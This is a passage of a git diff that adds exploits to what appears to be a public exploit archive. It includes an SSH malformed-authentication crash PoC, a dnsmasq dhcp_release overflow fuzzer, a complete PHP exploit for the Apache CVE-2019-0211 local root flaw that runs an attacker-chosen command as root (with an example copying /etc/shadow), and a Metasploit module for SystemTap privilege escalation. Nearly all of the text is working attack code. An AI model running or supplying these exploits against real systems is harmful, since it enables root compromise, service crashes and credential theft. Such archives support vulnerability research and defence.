+t = paramiko.Transport(sock)
+t.start_client()
+
+t.lock.acquire()
+m = paramiko.Message()
+m.add_byte(cMSG_SERVICE_REQUEST)
+m.add_string("ssh-userauth")
+t._send_message(m)
+
+m = paramiko.Message()
+m.add_byte(cMSG_USERAUTH_REQUEST)
+m.add_string(user)
+m.add_string("ssh-connection")
+m.add_string('publickey')
+m.add_boolean(True)
+m.add_string('ssh-ed25519')
+
+# Send an SSH key that is too short (ed25519 keys are 32 bytes)
+m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short')
+
+# Send an empty signature (the server won't get far enough to validate it)
+m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00')
+
+t._send_message(m)
+
+print('Malformed auth request sent. This should cause a panic on the remote server.')
\ No newline at end of file
diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py
new file mode 100755
index 000000000..aa6146124
--- /dev/null
+++ b/exploits/linux/dos/48301.py
@@ -0,0 +1,38 @@
+# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
+# Date: 2020-04-06
+# Exploit Author: Josue Encinar
+# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
+# Version: 2.79 
+# Tested on: Ubuntu 18.04
+
+
+from subprocess import Popen, PIPE
+
+data = ""
+bof = False
+for i in range (1, 200):
+    A = "A"*i
+    data = f"dhcp_release {A} 1 1"
+    try:
+        result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
+        error = result.stderr.read().decode()
+        if "Aborted (core dumped)" in error:
+            print("[+] Buffer Overflow detected!")
+            print(f"[*] Offset: {i}")
+            bof = True
+            break
+    except Exception as e:
+        print(f"[-] {e}")
+
+if not bof:
+    print("[-] No buffer overflow...")
+
+
+## Check line 273 in dhcp_release.c 
+### strcpy(ifr.ifr_name, argv[1]);
+#
+## PoC:
+# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py 
+# *** buffer overflow detected ***: dhcp_release terminated
+# [+] Buffer Overflow detected!
+# [*] Offset: 16
\ No newline at end of file
diff --git a/exploits/linux/local/1518.c b/exploits/linux/local/1518.c
index 21c2d333c..b5eaf678d 100644
--- a/exploits/linux/local/1518.c
+++ b/exploits/linux/local/1518.c
@@ -29,7 +29,7 @@
  * $ id
  * uid=500(raptor) gid=500(raptor) groups=500(raptor)
  * $ gcc -g -c raptor_udf2.c
- * $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
+ * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  * $ mysql -u root -p
  * Enter password:
  * [...]
diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh
index 169b793f5..b00215e3a 100755
--- a/exploits/linux/local/40953.sh
+++ b/exploits/linux/local/40953.sh
@@ -2,7 +2,7 @@
 # 
 # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
 # Google Dork: vesta control panel inurl:8083
-# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker
+# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
 # Vendor Homepage: http://vestacp.com/
 # Software Link: https://github.com/serghey-rodin/vesta
 # Version: 0.9.7 - 0.9.8-16
diff --git a/exploits/linux/local/46676.php b/exploits/linux/local/46676.php
new file mode 100644
index 000000000..864881183
--- /dev/null
+++ b/exploits/linux/local/46676.php
@@ -0,0 +1,795 @@
+<?php
+# CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation
+# Charles Fol
+# @cfreal_
+# 2019-04-08
+#
+# INFOS
+#
+# https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
+#
+# USAGE
+#
+# 1. Upload exploit to Apache HTTP server
+# 2. Send request to page
+# 3. Await 6:25AM for logrotate to restart Apache
+# 4. python3.5 is now suid 0
+#
+# You can change the command that is ran as root using the cmd HTTP
+# parameter (GET/POST).
+# Example: curl http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/
+#
+# SUCCESS RATE
+#
+# Number of successful and failed exploitations relative to of the number
+# of MPM workers (i.e. Apache subprocesses). YMMV.
+#
+# W  --% S   F
+#  5 87% 177 26 (default)
+#  8 89%  60  8
+# 10 95%  70  4
+#
+# More workers, higher success rate.
+# By default (5 workers), 87% success rate. With huge HTTPds, close to 100%.
+# Generally, failure is due to all_buckets being relocated too far from its
+# original address.
+#
+# TESTED ON
+#
+# - Apache/2.4.25
+# - PHP 7.2.12
+# - Debian GNU/Linux 9.6
+#
+# TESTING
+#
+# $ curl http://localhost/cfreal-carpediem.php
+# $ sudo /usr/sbin/logrotate /etc/logrotate.conf --force
+# $ ls -alh /usr/bin/python3.5
+# -rwsr-sr-x 2 root root 4.6M Sep 27  2018 /usr/bin/python3.5
+#
+# There are no hardcoded addresses.
+# - Addresses read through /proc/self/mem
+# - Offsets read through ELF parsing
+#
+# As usual, there are tons of comments.
+#
+
+
+o('CARPE (DIEM) ~ CVE-2019-0211');
+o('');
+
+error_reporting(E_ALL);
+
+
+# Starts the exploit by triggering the UAF.
+function real()
+{
+	global $y;
+	$y = [new Z()];
+	json_encode([0 => &$y]);
+}
+
+# In order to read/write what comes after in memory, we need to UAF a string so
+# that we can control its size and make in-place edition.
+# An easy way to do that is to replace the string by a timelib_rel_time
+# structure of which the first bytes can be reached by the (y, m, d, h, i, s)
+# properties of the DateInterval object.
+#
+# Steps:
+# - Create a base object (Z)
+# - Add string property (abc) so that sizeof(abc) = sizeof(timelib_rel_time)
+# - Create DateInterval object ($place) meant to be unset and filled by another
+# - Trigger the UAF by unsetting $y[0], which is still reachable using $this
+# - Unset $place: at this point, if we create a new DateInterval object, it will
+#   replace $place in memory
+# - Create a string ($holder) that fills $place's timelib_rel_time structure
+# - Allocate a new DateInterval object: its timelib_rel_time structure will
+#   end up in place of abc
+# - Now we can control $this->abc's zend_string structure entirely using
+#   y, m, d etc.
+# - Increase abc's size so that we can read/write memory that comes after it,
+#   especially the shared memory block
+# - Find out all_buckets' position by finding a memory region that matches the
+#   mutex->meth structure
+# - Compute the bucket index required to reach the SHM and get an arbitrary
+#   function call
+# - Scan ap_scoreboard_image->parent[] to find workers' PID and replace the
+#   bucket
+class Z implements JsonSerializable
+{
+	public function jsonSerialize()
+	{
+		global $y, $addresses, $workers_pids;
+
+		#
+		# Setup memory
+		#
+        o('Triggering UAF');
+		o('  Creating room and filling empty spaces');
+
+		# Fill empty blocks to make sure our allocations will be contiguous
+		# I: Since a lot of allocations/deallocations happen before the script
+		# is ran, two variables instanciated at the same time might not be
+		# contiguous: this can be a problem for a lot of reasons.
+		# To avoid this, we instanciate several DateInterval objects. These
+		# objects will fill a lot of potentially non-contiguous memory blocks,
+		# ensuring we get "fresh memory" in upcoming allocations.
+		$contiguous = [];
+		for($i=0;$i<10;$i++)
+			$contiguous[] = new DateInterval('PT1S');
+
+		# Create some space for our UAF blocks not to get overwritten
+		# I: A PHP object is a combination of a lot of structures, such as
+		# zval, zend_object, zend_object_handlers, zend_string, etc., which are
+		# all allocated, and freed when the object is destroyed.
+		# After the UAF is triggered on the object, all the structures that are
+		# used to represent it will be marked as free.
+		# If we create other variables afterwards, those variables might be
+		# allocated in the object's previous memory regions, which might pose
+		# problems for the rest of the exploitation.
+		# To avoid this, we allocate a lot of objects before the UAF, and free
+		# them afterwards. Since PHP's heap is LIFO, when we create other vars,
+		# they will take the place of those objects instead of the object we
+		# are triggering the UAF on. This means our object is "shielded" and
+		# we don't have to worry about breaking it.
+		$room = [];
+		for($i=0;$i<10;$i++)
+			$room[] = new Z();
+
+		# Build string meant to fill old DateInterval's timelib_rel_time
+		# I: ptr2str's name is unintuitive here: we just want to allocate a
+		# zend_string of size 78.
+		$_protector = ptr2str(0, 78);
+
+		o('  Allocating $abc and $p');
+
+		# Create ABC
+		# I: This is the variable we will use to R/W memory afterwards.
+		# After we free the Z object, we'll make sure abc is overwritten by a
+		# timelib_rel_time structure under our control. The first 8*8 = 64 bytes
+		# of this structure can be modified easily, meaning we can change the
+		# size of abc. This will allow us to read/write memory after abc.
+		$this->abc = ptr2str(0, 79);
+
+		# Create $p meant to protect $this's blocks
+		# I: Right after we trigger the UAF, we will unset $p.
+		# This means that the timelib_rel_time structure (TRT) of this object
+		# will be freed. We will then allocate a string ($protector) of the same
+		# size as TRT. Since PHP's heap is LIFO, the string will take the place
+		# of the now-freed TRT in memory.
+		# Then, we create a new DateInterval object ($x). From the same
+		# assumption, every structure constituting this new object will take the
+		# place of the previous structure. Nevertheless, since TRT's memory
+		# block has already been replaced by $protector, the new TRT will be put
+		# in the next free blocks of the same size, which happens to be $abc
+		# (remember, |abc| == |timelib_rel_time|).
+		# We now have the following situation: $x is a DateInterval object whose
+		# internal TRT structure has the same address as $abc's zend_string.
+		$p = new DateInterval('PT1S');
+
+		#
+		# Trigger UAF
+		#
+		
+		o('  Unsetting both variables and setting $protector');
+		# UAF here, $this is usable despite being freed
+		unset($y[0]);
+		# Protect $this's freed blocks
+		unset($p);
+
+		# Protect $p's timelib_rel_time structure
+		$protector = ".$_protector";
+		# !!! This is only required for apache
+		# Got no idea as to why there is an extra deallocation (?)
+		$room[] = "!$_protector";
+
+		o('  Creating DateInterval object');
+		# After this line:
+		# &((php_interval_obj) x).timelib_rel_time == ((zval) abc).value.str
+		# We can control the structure of $this->abc and therefore read/write
+		# anything that comes after it in memory by changing its size and
+		# making in-place edits using $this->abc[$position] = $char
+		$x = new DateInterval('PT1S');
+		# zend_string.refcount = 0
+		# It will get incremented at some point, and if it is > 1,
+		# zend_assign_to_string_offset() will try to duplicate it before making
+		# the in-place replacement
+		$x->y = 0x00;
+		# zend_string.len
+		$x->d = 0x100;
+		# zend_string.val[0-4]
+		$x->h = 0x13121110;
+
+		# Verify UAF was successful
+		# We modified stuff via $x; they should be visible by $this->abc, since
+		# they are at the same memory location.
+		if(!(
+			strlen($this->abc) === $x->d &&
+			$this->abc[0] == "\x10" &&
+			$this->abc[1] == "\x11" &&
+			$this->abc[2] == "\x12" &&
+			$this->abc[3] == "\x13"
+		))
+		{
+			o('UAF failed, exiting.');
+			exit();
+		}
+		o('UAF successful.');
+		o('');
+
+		# Give us some room
+		# I: As indicated before, just unset a lot of stuff so that next allocs
+		# don't break our fragile UAFd structure.
+		unset($room);
+
+		#
+		# Setup the R/W primitive
+		#
+
+		# We control $abc's internal zend_string structure, therefore we can R/W
+		# the shared memory block (SHM), but for that we need to know the
+		# position of $abc in memory
+		# I: We know the absolute position of the SHM, so we need to need abc's
+		# as well, otherwise we cannot compute the offset
+
+		# Assuming the allocation was contiguous, memory looks like this, with
+		# 0x70-sized fastbins:
+		# 	[zend_string:abc]
+		# 	[zend_string:protector]
+		# 	[FREE#1]
+		# 	[FREE#2]
+		# Therefore, the address of the 2nd free block is in the first 8 bytes
+		# of the first block: 0x70 * 2 - 24
+		$address = str2ptr($this->abc, 0x70 * 2 - 24);
+		# The address we got points to FREE#2, hence we're |block| * 3 higher in
+		# memory
+		$address = $address - 0x70 * 3;
+		# The beginning of the string is 24 bytes after its origin
+		$address = $address + 24;
+		o('Address of $abc: 0x' . dechex($address));
+		o('');
+
+		# Compute the size required for our string to include the whole SHM and
+		# apache's memory region
+		$distance = 
+			max($addresses['apache'][1], $addresses['shm'][1]) -
+			$address
+		;
+		$x->d = $distance;
+
+		# We can now read/write in the whole SHM and apache's memory region.
+
+		#
+		# Find all_buckets in memory
+		#
+
+		# We are looking for a structure s.t.
+		# |all_buckets, mutex| = 0x10
+		# |mutex, meth| = 0x8
+		# all_buckets is in apache's memory region
+		# mutex is in apache's memory region
+		# meth is in libaprR's memory region
+		# meth's function pointers are in libaprX's memory region
+		o('Looking for all_buckets in memory');
+		$all_buckets = 0;
+
+		for(
+			$i = $addresses['apache'][0] + 0x10;
+			$i < $addresses['apache'][1] - 0x08;
+			$i += 8
+		)
+		{
+			# mutex
+			$mutex = $pointer = str2ptr($this->abc, $i - $address);
+			if(!in($pointer, $addresses['apache']))
+				continue;
+
+
+			# meth
+			$meth = $pointer = str2ptr($this->abc, $pointer + 0x8 - $address);
+			if(!in($pointer, $addresses['libaprR']))
+				continue;
+
+			o('  [&mutex]: 0x' . dechex($i));
+			o('    [mutex]: 0x' . dechex($mutex));
+			o('      [meth]: 0x' . dechex($meth));
+
+
+			# meth->*
+			# flags
+			if(str2ptr($this->abc, $pointer - $address) != 0)
+				continue;
+			# methods
+			for($j=0;$j<7;$j++)
+			{
+				$m = str2ptr($this->abc, $pointer + 0x8 + $j * 8 - $address);
+				if(!in($m, $addresses['libaprX']))
+					continue 2;
+				o('        [*]: 0x' . dechex($m));
+			}
+
+			$all_buckets = $i - 0x10;
+			o('all_buckets = 0x' . dechex($all_buckets));
+			break;
+		}
+
+		if(!$all_buckets)
+		{
+			o('Unable to find all_buckets');
+			exit();
+		}
+
+		o('');
+
+		# The address of all_buckets will change when apache is gracefully
+		# restarted. This is a problem because we need to know all_buckets's
+		# address in order to make all_buckets[some_index] point to a memory
+		# region we control.
+
+		#
+		# Compute potential bucket indexes and their addresses
+		#
+
+        o('Computing potential bucket indexes and addresses');
+
+		# Since we have sizeof($workers_pid) MPM workers, we can fill the rest
+		# of the ap_score_image->servers items, so 256 - sizeof($workers_pids),
+		# with data we like. We keep the one at the top to store our payload.
+		# The rest is sprayed with the address of our payload.
+
+		$size_prefork_child_bucket = 24;
+		$size_worker_score = 264;
+		# I get strange errors if I use every "free" item, so I leave twice as
+		# many items free. I'm guessing upon startup some
+		$spray_size = $size_worker_score * (256 - sizeof($workers_pids) * 2);
+		$spray_max = $addresses['shm'][1];
+		$spray_min = $spray_max - $spray_size;
+
+		$spray_middle = (int) (($spray_min + $spray_max) / 2);
+		$bucket_index_middle = (int) (
+			- ($all_buckets - $spray_middle) /
+			$size_prefork_child_bucket
+		);
+
+		#
+		# Build payload
+		#
+
+		# A worker_score structure was kept empty to put our payload in
+		$payload_start = $spray_min - $size_worker_score;
+
+		$z = ptr2str(0);
+
+    	# Payload maxsize 264 - 112 = 152
+		# Offset 8 cannot be 0, but other than this you can type whatever
+		# command you want
+    	$bucket = isset($_REQUEST['cmd']) ?
+    		$_REQUEST['cmd'] :
+    		"chmod +s /usr/bin/python3.5";
+
+    	if(strlen($bucket) > $size_worker_score - 112)
+		{
+			o(
+				'Payload size is bigger than available space (' .
+				($size_worker_score - 112) .
+				'), exiting.'
+			);
+			exit();
+		}
+    	# Align
+    	$bucket = str_pad($bucket, $size_worker_score - 112, "\x00");
+
+    	# apr_proc_mutex_unix_lock_methods_t
+		$meth = 
+		    $z .
+		    $z .
+		    $z .
+		    $z .
+		    $z .
+		    $z .
+			# child_init
+		    ptr2str($addresses['zend_object_std_dtor'])
+		;
+
+		# The second pointer points to meth, and is used before reaching the
+		# arbitrary function call
+		# The third one and the last one are both used by the function call
+		# zend_object_std_dtor(object) => ... => system(&arData[0]->val)
+		$properties = 
+			# refcount
+			ptr2str(1) .
+			# u-nTableMask meth
+			ptr2str($payload_start + strlen($bucket)) .
+			# Bucket arData
+			ptr2str($payload_start) .
+			# uint32_t nNumUsed;
+			ptr2str(1, 4) .
+		    # uint32_t nNumOfElements;
+			ptr2str(0, 4) .
+			# uint32_t nTableSize
+			ptr2str(0, 4) .
+			# uint32_t nInternalPointer
+			ptr2str(0, 4) .
+			# zend_long nNextFreeElement
+			$z .
+			# dtor_func_t pDestructor
+			ptr2str($addresses['system'])
+		;
+
+		$payload =
+			$bucket .
+			$meth .
+			$properties
+		;
+
+		# Write the payload
+
+		o('Placing payload at address 0x' . dechex($payload_start));
+
+		$p = $payload_start - $address;
+		for(
+			$i = 0;
+			$i < strlen($payload);
+			$i++
+		)
+		{
+			$this->abc[$p+$i] = $payload[$i];
+		}
+
+		# Fill the spray area with a pointer to properties
+		
+		$properties_address = $payload_start + strlen($bucket) + strlen($meth);
+		o('Spraying pointer');
+		o('  Address: 0x' . dechex($properties_address));
+		o('  From: 0x' . dechex($spray_min));
+		o('  To: 0x' . dechex($spray_max));
+		o('  Size: 0x' . dechex($spray_size));
+		o('  Covered: 0x' . dechex($spray_size * count($workers_pids)));
+		o('  Apache: 0x' . dechex(
+			$addresses['apache'][1] -
+			$addresses['apache'][0]
+		));
+
+		$s_properties_address = ptr2str($properties_address);
+
+		for(
+			$i = $spray_min;
+			$i < $spray_max;
+			$i++
+		)
+		{
+			$this->abc[$i - $address] = $s_properties_address[$i % 8];
+		}
+		o('');
+
+		# Find workers PID in the SHM: it indicates the beginning of their
+		# process_score structure. We can then change process_score.bucket to
+		# the index we computed. When apache reboots, it will use
+		# all_buckets[ap_scoreboard_image->parent[i]->bucket]->mutex
+		# which means we control the whole apr_proc_mutex_t structure.
+		# This structure contains pointers to multiple functions, especially
+		# mutex->meth->child_init(), which will be called before privileges
+		# are dropped.
+		# We do this for every worker PID, incrementing the bucket index so that
+		# we cover a bigger range.
+		
+		o('Iterating in SHM to find PIDs...');
+
+		# Number of bucket indexes covered by our spray
+		$spray_nb_buckets = (int) ($spray_size / $size_prefork_child_bucket);
+		# Number of bucket indexes covered by our spray and the PS structures
+		$total_nb_buckets = $spray_nb_buckets * count($workers_pids);
+		# First bucket index to handle
+		$bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2);
+
+		# Iterate over every process_score structure until we find every PID or
+		# we reach the end of the SHM
+		for(
+			$p = $addresses['shm'][0] + 0x20;
+			$p < $addresses['shm'][1] && count($workers_pids) > 0;
+			$p += 0x24
+		)
+		{
+			$l = $p - $address;
+			$current_pid = str2ptr($this->abc, $l, 4);
+			o('Got PID: ' . $current_pid);
+			# The PID matches one of the workers
+			if(in_array($current_pid, $workers_pids))
+			{
+				unset($workers_pids[$current_pid]);
+				o('  PID matches');
+				# Update bucket address
+				$s_bucket_index = pack('l', $bucket_index);
+				$this->abc[$l + 0x20] = $s_bucket_index[0];
+				$this->abc[$l + 0x21] = $s_bucket_index[1];
+				$this->abc[$l + 0x22] = $s_bucket_index[2];
+				$this->abc[$l + 0x23] = $s_bucket_index[3];
+				o('  Changed bucket value to ' . $bucket_index);
+				$min = $spray_min - $size_prefork_child_bucket * $bucket_index;
+				$max = $spray_max - $size_prefork_child_bucket * $bucket_index;
+				o('  Ranges: 0x' . dechex($min) . ' - 0x' . dechex($max));
+				# This bucket range is covered, go to the next one
+				$bucket_index += $spray_nb_buckets;
+			}
+		}
+
+		if(count($workers_pids) > 0)
+		{
+			o(
+				'Unable to find PIDs ' .
+				implode(', ', $workers_pids) .
+				' in SHM, exiting.'
+			);
+			exit();
+		}
+
+		o('');
+		o('EXPLOIT SUCCESSFUL.');
+		o('Await 6:25AM.');
+		
+		return 0;
+	}
+}
+
+function o($msg)
+{
+	# No concatenation -> no string allocation
+	print($msg);
+	print("\n");
+}
+
+function ptr2str($ptr, $m=8)
+{
+	$out = "";
+    for ($i=0; $i<$m; $i++)
+    {
+        $out .= chr($ptr & 0xff);
+        $ptr >>= 8;
+    }
+    return $out;
+}
+
+function str2ptr(&$str, $p, $s=8)
+{
+	$address = 0;
+	for($j=$s-1;$j>=0;$j--)
+	{
+		$address <<= 8;
+		$address |= ord($str[$p+$j]);
+	}
+	return $address;
+}
+
+function in($i, $range)
+{
+	return $i >= $range[0] && $i < $range[1];
+}
+
+/**
+ * Finds the offset of a symbol in a file.
+ */
+function find_symbol($file, $symbol)
+{
+    $elf = file_get_contents($file);
+    $e_shoff = str2ptr($elf, 0x28);
+    $e_shentsize = str2ptr($elf, 0x3a, 2);
+    $e_shnum = str2ptr($elf, 0x3c, 2);
+
+    $dynsym_off = 0;
+    $dynsym_sz = 0;
+    $dynstr_off = 0;
+
+    for($i=0;$i<$e_shnum;$i++)
+    {
+        $offset = $e_shoff + $i * $e_shentsize;
+        $sh_type = str2ptr($elf, $offset + 0x04, 4);
+
+        $SHT_DYNSYM = 11;
+        $SHT_SYMTAB = 2;
+        $SHT_STRTAB = 3;
+
+        switch($sh_type)
+        {
+            case $SHT_DYNSYM:
+                $dynsym_off = str2ptr($elf, $offset + 0x18, 8);
+                $dynsym_sz = str2ptr($elf, $offset + 0x20, 8);
+                break;
+            case $SHT_STRTAB:
+            case $SHT_SYMTAB:
+                if(!$dynstr_off)
+                    $dynstr_off = str2ptr($elf, $offset + 0x18, 8);
+                break;
+        }
+
+    }
+
+    if(!($dynsym_off && $dynsym_sz && $dynstr_off))
+        exit('.');
+
+    $sizeof_Elf64_Sym = 0x18;
+
+    for($i=0;$i * $sizeof_Elf64_Sym < $dynsym_sz;$i++)
+    {
+        $offset = $dynsym_off + $i * $sizeof_Elf64_Sym;
+        $st_name = str2ptr($elf, $offset, 4);
+        
+        if(!$st_name)
+            continue;
+        
+        $offset_string = $dynstr_off + $st_name;
+        $end = strpos($elf, "\x00", $offset_string) - $offset_string;
+        $string = substr($elf, $offset_string, $end);
+
+        if($string == $symbol)
+        {
+            $st_value = str2ptr($elf, $offset + 0x8, 8);
+            return $st_value;
+        }
+    }
+
+    die('Unable to find symbol ' . $symbol);
+}
+
+# Obtains the addresses of the shared memory block and some functions through 
+# /proc/self/maps
+# This is hacky as hell.
+function get_all_addresses()
+{
+	$addresses = [];
+	$data = file_get_contents('/proc/self/maps');
+	$follows_shm = false;
+
+	foreach(explode("\n", $data) as $line)
+	{
+		if(!isset($addresses['shm']) && strpos($line, '/dev/zero'))
+		{
+            $line = explode(' ', $line)[0];
+            $bounds = array_map('hexdec', explode('-', $line));
+            if ($bounds[1] - $bounds[0] == 0x14000)
+            {
+                $addresses['shm'] = $bounds;
+                $follows_shm = true;
+            }
+        }
+		if(
+			preg_match('#(/[^\s]+libc-[0-9.]+.so[^\s]*)#', $line, $matches) &&
+			strpos($line, 'r-xp')
+		)
+		{
+			$offset = find_symbol($matches[1], 'system');
+			$line = explode(' ', $line)[0];
+			$line = hexdec(explode('-', $line)[0]);
+			$addresses['system'] = $line + $offset;
+		}
+		if(
+			strpos($line, 'libapr-1.so') &&
+			strpos($line, 'r-xp')
+		)
+		{
+			$line = explode(' ', $line)[0];
+			$bounds = array_map('hexdec', explode('-', $line));
+			$addresses['libaprX'] = $bounds;
+		}
+		if(
+			strpos($line, 'libapr-1.so') &&
+			strpos($line, 'r--p')
+		)
+		{
+			$line = explode(' ', $line)[0];
+			$bounds = array_map('hexdec', explode('-', $line));
+			$addresses['libaprR'] = $bounds;
+		}
+		# Apache's memory block is between the SHM and ld.so
+		# Sometimes some rwx region gets mapped; all_buckets cannot be in there
+		# but we include it anyways for the sake of simplicity
+		if(
+			(
+				strpos($line, 'rw-p') ||
+				strpos($line, 'rwxp')
+			) &&
+            $follows_shm
+		)
+		{
+            if(strpos($line, '/lib'))
+            {
+                $follows_shm = false;
+                continue;
+            }
+			$line = explode(' ', $line)[0];
+			$bounds = array_map('hexdec', explode('-', $line));
+			if(!array_key_exists('apache', $addresses))
+			    $addresses['apache'] = $bounds;
+			else if($addresses['apache'][1] == $bounds[0])
+                $addresses['apache'][1] = $bounds[1];
+			else
+                $follows_shm = false;
+		}
+		if(
+			preg_match('#(/[^\s]+libphp7[0-9.]+.so[^\s]*)#', $line, $matches) &&
+			strpos($line, 'r-xp')
+		)
+		{
+			$offset = find_symbol($matches[1], 'zend_object_std_dtor');
+			$line = explode(' ', $line)[0];
+			$line = hexdec(explode('-', $line)[0]);
+			$addresses['zend_object_std_dtor'] = $line + $offset;
+		}
+	}
+
+	$expected = [
+		'shm', 'system', 'libaprR', 'libaprX', 'apache', 'zend_object_std_dtor'
+	];
+	$missing = array_diff($expected, array_keys($addresses));
+
+	if($missing)
+	{
+		o(
+			'The following addresses were not determined by parsing ' .
+			'/proc/self/maps: ' . implode(', ', $missing)
+		);
+		exit(0);
+	}
+
+
+	o('PID: ' . getmypid());
+	o('Fetching addresses');
+
+	foreach($addresses as $k => $a)
+	{
+		if(!is_array($a))
+			$a = [$a];
+		o('  ' . $k . ': ' . implode('-0x', array_map(function($z) {
+				return '0x' . dechex($z);
+		}, $a)));
+	}
+	o('');
+
+	return $addresses;
+}
+
+# Extracts PIDs of apache workers using /proc/*/cmdline and /proc/*/status,
+# matching the cmdline and the UID
+function get_workers_pids()
+{
+	o('Obtaining apache workers PIDs');
+	$pids = [];
+	$cmd = file_get_contents('/proc/self/cmdline');
+	$processes = glob('/proc/*');
+	foreach($processes as $process)
+	{
+		if(!preg_match('#^/proc/([0-9]+)$#', $process, $match))
+			continue;
+		$pid = (int) $match[1];
+		if(
+			!is_readable($process . '/cmdline') ||
+			!is_readable($process . '/status')
+		)
+			continue;
+		if($cmd !== file_get_contents($process . '/cmdline'))
+			continue;
+
+		$status = file_get_contents($process . '/status');
+		foreach(explode("\n", $status) as $line)
+		{
+			if(
+				strpos($line, 'Uid:') === 0 &&
+				preg_match('#\b' . posix_getuid() . '\b#', $line)
+			)
+			{
+				o('  Found apache worker: ' . $pid);
+				$pids[$pid] = $pid;
+				break;
+			}
+
+		}
+	}
+	
+	o('Got ' . sizeof($pids) . ' PIDs.');
+	o('');
+
+	return $pids;
+}
+
+$addresses = get_all_addresses();
+$workers_pids = get_workers_pids();
+real();
\ No newline at end of file
diff --git a/exploits/linux/local/46730.rb b/exploits/linux/local/46730.rb
new file mode 100755
index 000000000..b58d7b0dc
--- /dev/null
+++ b/exploits/linux/local/46730.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges by exploiting a
+        vulnerability in the `staprun` executable included with SystemTap
+        version 1.3.
+
+        The `staprun` executable does not clear environment variables prior to
+        executing `modprobe`, allowing an arbitrary configuration file to be
+        specified in the `MODPROBE_OPTIONS` environment variable, resulting
+        in arbitrary command execution with root privileges.
+
+        This module has been tested successfully on:
+
+        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
+        systemtap 1.1-3.el5 on RHEL 5.5 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Tavis Ormandy', # Discovery and exploit
+          'bcoles'         # Metasploit
+        ],
+      'DisclosureDate' => '2010-11-17',
+      'References'     =>
+        [
+          ['BID', '44914'],
+          ['CVE', '2010-4170'],
+          ['EDB', '15620'],
+          ['URL', 'https://securitytracker.com/id?1024754'],
+          ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
+          ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
+          ['URL', 'https://bugs.launchpad.net/bugs/677226'],
+          ['URL', 'https://www.debian.org/security/2011/dsa-2348']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def staprun_path
+    datastore['STAPRUN_PATH']
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def check
+    # On some systems, staprun execution is restricted to stapusr group:
+    # ---s--x---. 1 root stapusr 178488 Mar 28  2014 /usr/bin/staprun
+    unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
+      vprint_error "#{staprun_path} is not executable"
+      return CheckCode::Safe
+    end
+    vprint_good "#{staprun_path} is executable"
+
+    unless setuid? staprun_path
+      vprint_error "#{staprun_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{staprun_path} is setuid"
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 10..15}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    config_path = "#{base_dir}/#{payload_name}.conf"
+    upload config_path, "install uprobes /bin/sh"
+
+    print_status 'Executing payload...'
+    res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
+    vprint_line res
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/46807.txt b/exploits/linux/local/46807.txt
